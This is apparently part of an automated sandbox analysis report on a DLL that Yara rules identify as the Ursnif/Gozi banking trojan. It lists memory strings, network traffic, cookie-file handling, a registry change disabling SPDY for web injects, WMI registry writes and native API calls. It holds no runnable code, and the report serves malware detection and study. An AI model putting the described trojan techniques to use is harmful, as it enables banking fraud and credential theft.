          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: explorer.exe, 00000024.00000000.431688638.0000000008BB0000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
          Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpMSN
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49749 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49747 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49751 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49748 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49750 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

          E-Banking Fraud:

          barindex
          Detected Gozi e-Banking trojanShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY
          Disables SPDY (HTTP compression, likely to perform web injects)Show sources
          Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Writes or reads registry keys via WMIShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Writes registry values via WMIShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027734D0 NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02774F73 GetProcAddress,NtCreateSection,memset,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027711A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0277B159 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0540E529 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05410D8D memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0540CCD9 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05415E21 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0541C6FE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05405E8A NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05422AAC NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05414518 NtGetContextThread,RtlNtStatusToDosError,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_054105FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05408F6D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_054117CD memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05422E10 NtQuerySystemInformation,RtlNtStatusToDosError,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0540E6C4 memset,NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05403934 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0540A818 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0540F314 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05402A0A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_054235BC CreateProcessAsUserA,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027728E9
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0277AF34
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05423C5C
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0541BC93
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0541CFA3
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05421669
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05412678
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05413604
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0542086C
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05414804
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0540C307
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0540BBA1
          Source: mu1rnx1a.dll.27.drStatic PE information: No import functions for PE file found
          Source: yacmzdf3.dll.30.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
          Source: C:\Windows\explorer.exeSection loaded: cryptdlg.dll
          Source: NJPcHPuRcG.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
          Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
